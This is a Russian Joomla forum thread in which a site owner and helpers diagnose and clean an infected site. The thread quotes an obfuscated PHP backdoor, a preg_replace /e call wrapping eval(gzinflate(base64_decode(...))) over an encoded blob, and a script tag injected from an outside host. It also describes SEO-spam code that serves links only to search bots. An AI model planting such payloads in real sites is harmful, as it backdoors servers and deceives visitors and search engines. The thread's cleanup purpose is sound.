Новости Joomla

Вышел JoomShopping 5.9.0 - компонент интернет-магазина для Joomla

Вышел JoomShopping 5.9.0 - компонент интернет-магазина для Joomla.

Вышло обновление JL Like 5.2

Вышло обновление JL Like 5.2

JL Like — современный плагин для Joomla, который добавляет стильные кнопки "Поделиться" и счетчики лайков популярных соцсетей.

Совет по Joomla: использовать выключенное состояние для кнопок в списках элементов админки

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 33 Ответов
  • 4109 Просмотров
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
?>echo ' '; на всех страницах сайта и админки. как убрать?
« : 26.09.2014, 01:33:14 »
Код
 ?>echo ' ';
- такая часть кода висит в футуре на всех страницах сайта и админки. как убрать?
спасибо.
Записан
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #1 : 26.09.2014, 05:49:20 »
Без пациента тут не разобраться, а вообще это кусок коряво написанного кода.
Интересно, почему и на страницах сайта и админки?
Попробуйте посмотреть через фаербуг.
Записан
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Re: >echo ' '; на всех страницах сайта и админки. как уk
« Ответ #2 : 26.09.2014, 09:48:13 »
Предположу, что  какой-то плагин косячит.
Записан
Разработка, доработка расширений для Joomla!
*

fbr

  • Завсегдатай
  • 1683
  • 210 / 7
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #3 : 26.09.2014, 10:01:20 »
скорее всего ошибка в синтаксисе, где-то в шаблоне
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как уk
« Ответ #4 : 26.09.2014, 13:56:30 »
вот пациент http://site.ru/
« Последнее редактирование: 27.09.2014, 03:04:03 от amtih »
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #5 : 26.09.2014, 13:59:20 »
Цитата: fbr от 26.09.2014, 10:01:20
скорее всего ошибка в синтаксисе, где-то в шаблоне
но отображается этот кусок кода и в админке. может где на уровень выше? предположительно в каком файле может сидеть такая ошибка?
Записан
*

Sergeyy

  • Захожу иногда
  • 154
  • 3 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #6 : 26.09.2014, 17:20:05 »
Единственное, что отображается и в админке и на сайте это - Консоль отладки Joomla!

Так так, а что это такое:
Код
<div id="footer">
echo '
<div style="position:fixed; top: 0; right: 0; z-index: 999">
<script frameborder="0" left="0" top="0" widget="1013" height="250" width="300" src="http://medicswap.com/js/widget.js">
Перезагрузите страницу, чтобы получить источник для: http://medicswap.com/js/widget.js
</script>
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #7 : 26.09.2014, 17:46:28 »
Цитата: Sergeyy от 26.09.2014, 17:20:05

Так так, а что это такое:

сам не знаю. пытаюсь сейчас понять. ясно только что сайт был взломан одно время.
Записан
*

passer

  • Завсегдатай
  • 1013
  • 75 / 3
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #8 : 26.09.2014, 18:03:26 »
Yandex.Metrika чем выводится? Там посмотрите.
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как уk
« Ответ #9 : 26.09.2014, 18:17:19 »
http://site.ru/administrator/
здесь метрики нет, а кусок кода есть
« Последнее редактирование: 27.09.2014, 03:03:18 от amtih »
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как уk
« Ответ #10 : 26.09.2014, 18:25:54 »
Спойлер
[свернуть]

вот код файла index.php шаблона админки
грешу на последнюю строку
такая же есть и в шаблоне сайта
но ее удаление убирает только
Код
?>
из 
Код
?>echo '';
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #11 : 26.09.2014, 18:33:57 »
Ну как и ожадалось, сайт заражен, велкам в раздел безопасность - читать, а не писать!
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #12 : 26.09.2014, 19:16:05 »
попробуйте удалить из строки

Код
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfNbuRGDITvAfYdDMOH5LIY9a8EY9/ElxmNfdkkC+cQDPL0aRY/WholMLAHYfTT3SSLxSLn6bb+8eN7e3j4+u3h8eXWT+NKL7dWx9VfbvVte7ZvbR3XNK7s79I8rvE9jXXpdVxnv9c3e7/6bx2/fazNbVx199z93d336f655N3zOCvPh/X9/rxy2J+Xw3n18L19Yu/oj/lbPonn//w7xn8872hvf14++JcP9sfacsTvM//af+391H7iS8PvPnJdbf/4bcV5kuGJ5UA4j/tsnGpctm7xc8rgS7v4GXXxtfY99uhd83v5OPmzcbAappHr5mfaWb37Pq2vrBvP3XCanZtl8TM63LEr+Gy+y36C79X5Y1exvcO/dh1rzr7HsDC8zLZdFr/8sFisTsyW1cTF/ZVPYF4661hTi2NcT4/PX355uv31/n5LUZhmVE7NOHvleuWA4gGZ8w3D5pyBrISs7mjPbsx+RfSTG46iFkCrg5QjiLG+JJJ13oA1u+aPAdtYb+QKPyrna93ZwckAbWAaKAK2kMjqCRQxzoD95vttbSN5StrkPshmJRGL+2+kNb/NRmuOkQFu90ZSi9dIoW8XbAVx8m7vjuB2dthXIUwU44z/b46DcIL8tlb4T463ETiz1mJVMU2OUbn4uYaTkbXuiCRbkFXxR5Elx9psyG4Uy8QZ3XlRrsRD8YnU3fOj4p3c93racWj29xXBE8nhkmGhptC9kAoYKPfVY7D9Iv3k/iunE7m/YPtCTGffU8I2+7Q2u11hkZzzZsNiEfbVse272MWxyPUJDCrnpC0nDQ4ZZ2rUT+WX+KMGxMXihXn7/k9ZojCVSIhdAEMGQ/FOblQFMdMdFoBf3bACmSBxRh3OKAqqJbIGwReCQZ1U0Gk7W/syhF1JGvY/SLAjfovkTKwlobI7oZiALSKsLhZS1asn2GLVGQiDSFNRfLr8hxgFcZrbkupzhrBJflU6hUQpux2LSbEEwXkXMZvfnYIKf8zHRhfodRNCiWJzHDKqL9/IjzpB8VjNdxM/YcCUZOsbqm3FUCB/RaSl+Mnjk1i3LbZMwarwy3aWcCV3wqaSF4pIxUfx1OAZgqpug7CrgNN9J1RXDl7S3dXNEkKX6doFDkd35dcKWgIVQj8jrAkbwekTRTVRtAt1kem8J7h84ezzNllYHiVgs7+3/Z1pVDi/ghd+alppXpjv5z9T/eiYF9QRgNWB8gaaAuuQtAMWBalkTYwgkVDUuuzUvERnIqGhXo3kNMApjB+VLhsjUA0ilq0jqPCjwy2MPYiBOllmdGB8bBBEPjOKmb9S/SD4xL6ZEQqhUdxRmBOgQua0Ew/zKYq3MR3oPm9Fp9EnpoogbuFbdOEFXF5R/tX9FoYrik9+MsKoyaeDd97iEa4z3Ty61ImunbYuo+KbyTWFrI5KvkNgNK0wWWXGUCNpDW40x1QFEFPLfmKiSEqMt1eEhxjFOXzt5KEyQcTk1RFeFQriry6fwB2xlb0LokMzEG/geGb600TBfb762H43yi8/8Zzdl/3fOl12/uXx+fXv8++/PvF38utDzK925w3T7lShvz3/Cw=='\x29\x29\x29\x3B","");?>

Код
"/.*/e",
(первый аргумент с запятой после него).
Записан
*

fbr

  • Завсегдатай
  • 1683
  • 210 / 7
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #13 : 26.09.2014, 21:38:57 »
:)
зачем лечить, когда можно удалить
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #14 : 26.09.2014, 22:22:42 »
удалил в index.php шаблона админки
Код
"/.*/e",

результат
на лицевой стороне
Код
 echo ' 
';
в исходном коде внизу
Код
</html>
echo '<div style="position:fixed; top: 0; right: 0; z-index: 999"><script src="http://medicswap.com/js/widget.js" width="300" height="250" widget="1013" top="0" left="0"frameBorder="0"></script> </div>';


удалил все в скобках
результат
на лицевой стороне
Код
 echo ' 
';
в исходном коде внизу
Код
</html>
echo '<div style="position:fixed; top: 0; right: 0; z-index: 999"><script src="http://medicswap.com/js/widget.js" width="300" height="250" widget="1013" top="0" left="0"frameBorder="0"></script> </div>';
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #15 : 26.09.2014, 22:23:31 »
пойду пока раздел безопасность почитаю
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #16 : 26.09.2014, 22:26:13 »
в админке продолжает отображаться? Удаляйте отовсюду из файлов фронт-энда, где оно есть. Мы сейчас пытаемся обмануть взломщика. А потом будем чистить. Взлом был примитивный.
« Последнее редактирование: 26.09.2014, 22:31:05 от capricorn »
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #17 : 26.09.2014, 22:55:15 »
да, в админке продолжает отображаться.
сейчас тогда попробую удалить "/.*/e", из других файлов.
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #18 : 26.09.2014, 23:00:52 »
Цитировать
да, в админке продолжает отображаться.

Это уже хуже. Но не расстраивайтесь. Пока удалите из всех остальных. Дальше подумаем.
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #19 : 26.09.2014, 23:55:13 »
в админке пропало yes!  *DRINK*

сидело в каждом index.php файле
в директории administration и в каждом шаблоне в index.php

сейчас с сайта поудаляю таким образом.

а что ели всю эту длинную строку кода-шифровки удалить?
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #20 : 27.09.2014, 00:54:16 »
на сайте не пропадает

правил index.php в корневой папке сайта и такие же файлы в каждой папке шаблонов
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #21 : 27.09.2014, 02:46:45 »
получилось и с сайта убрать. там на index.php в шаблоне стояли права только на чтение. сменил на 644 и правка записалась.

а что ели всю эту длинную строку кода-шифровки удалить? может это какой остаток вредоносного кода и он открывает лазейку для злоумышленника?
Записан
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #22 : 27.09.2014, 06:26:08 »
Цитировать
а что ели всю эту длинную строку кода-шифровки удалить? может это какой остаток вредоносного кода и он открывает лазейку для злоумышленника?

Удалять ее не торопитесь. Чистить надо  - тотально. Мы не знаем пока причину взлома.
Пока обновите все, сделав бэкап. И смотрите, что будет происходить дальше.
« Последнее редактирование: 27.09.2014, 06:40:15 от capricorn »
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #23 : 27.09.2014, 23:25:57 »
у меня в файле /includes/defines.php
подозрительные пару строк в конце
возможно это как то связано
Спойлер
[свернуть]
Записан
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #24 : 27.09.2014, 23:47:50 »
Цитата: amtih от 27.09.2014, 23:25:57
у меня в файле /includes/defines.php
подозрительные пару строк в конце
возможно это как то связано
Ничего себе пара строк!

P.S. Что этот код делает: он кормит Google- и Яндекс-боты (и только их, обычные браузеры не показывают) целым списком ссылок, формированных с k a f i s t тчк ru (заходили туда когда-нибудь?). Для каждой страницы вашего сайта есть отдельный список, они сохраняются в папке /tmp/mc-cache/ и обновляются каждый день.
Но главная проблема - найти дыру(ы), откуда все это попадает к вам. Без этого чистка файлов бесполезна, вредоносный код будет появляться снова и снова.
« Последнее редактирование: 28.09.2014, 11:40:32 от robert »
Записан
Не будь паразитом, сделай что-нибудь самостоятельно!
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #25 : 28.09.2014, 12:21:03 »
Цитировать
целым списком ссылок, формированных с k a f i s t тчк ru (заходили туда когда-нибудь?).
нет, не заходил
Цитировать
Для каждой страницы вашего сайта есть отдельный список, они сохраняются в папке /tmp/mc-cache/ и обновляются каждый день.
пока вижу только папку /tmp/

заметил что в вебмастере яндекса - загружено страниц более 4000 в индексе 72. эти тысячи возможно и генерируются заразой.

Код
"/.*/e",
эта часть кода, которую я удалил недавно, пока не появилась.

попробую снести эти две строки и поставить заплатки, что предлагают в разделе безопасности. пароли я предварительно уже сменил.
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #26 : 01.10.2014, 14:20:59 »
до удаления этих пару строк
Спойлер
[свернуть]
на страницах, сохраненных в кэше поисковиков, вверху отображалось с десяток ссылок.
посмотрел кэш Google за сегодня - уже нет их.
Записан
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #27 : 01.10.2014, 15:36:46 »
зарегистрировал сайт на http://www.siteguard.ru
он кое что подозревает
а именно
Спойлер
[свернуть]

и еще
Спойлер
[свернуть]
Записан
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #28 : 01.10.2014, 19:36:24 »
Цитата: amtih от 01.10.2014, 15:36:46
зарегистрировал сайт на http://www.siteguard.ru
он кое что подозревает
Это PhocaGallery и Яндекс.Метрика, ничего страшного.
Записан
Не будь паразитом, сделай что-нибудь самостоятельно!
*

amtih

  • Осваиваюсь на форуме
  • 23
  • 0 / 0
Re: >echo ' '; на всех страницах сайта и админки. как убрать?
« Ответ #29 : 07.10.2014, 03:06:50 »
Цитата: amtih от 01.10.2014, 14:20:59
до удаления этих пару строк
Спойлер
[свернуть]
на страницах, сохраненных в кэше поисковиков, вверху отображалось с десяток ссылок.
посмотрел кэш Google за сегодня - уже нет их.


ссылок по прежнему в свежем кэше поисковиков нет, index.php шаблонов и /includes/defines.php не тронуты
а вот папка pages в корне сайта появилась обратно 4.10.2014
(я ее удалил еще 24.09.2014)
и эта папка генерирует на сайте такого вида страницы
http://webcache.googleusercontent.com/search?q=cache:69vbTPq51mEJ:cips-spb.ru/pages/one/test-kontrol-biologiya-9-klass-fe.html+&cd=30&hl=en&ct=clnk&gl=ru
взял пример из кэша Google т к я повторно удалил папку pages

похоже папка pages генерирует страницы, а код в /includes/defines.php ставит ссылки на них в шапках страниц зараженных сайтов
вот еще 2 из сотни зараженный сайта и примеры их страниц
http://atelie-lotos.ru/fonts/nom/dogovor-bezvozmezdnogo-polzovaniya-zhilym-pomescheniem-obrazec-skachat-15.html
http://www.протеннис.рф/default/spravka/forma-balansovogo-otcheta-58
Записан
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3155 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 268233 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Доп. защита админки с jsecurelite

Автор ast

 Ответов: 1
Просмотров: 1925 		Последний ответ 16.02.2022, 13:37:25
от winstrool
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 2755 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Вместо админки пустая страница

Автор ornix

 Ответов: 3
Просмотров: 947 		Последний ответ 04.01.2021, 09:49:55
от ornix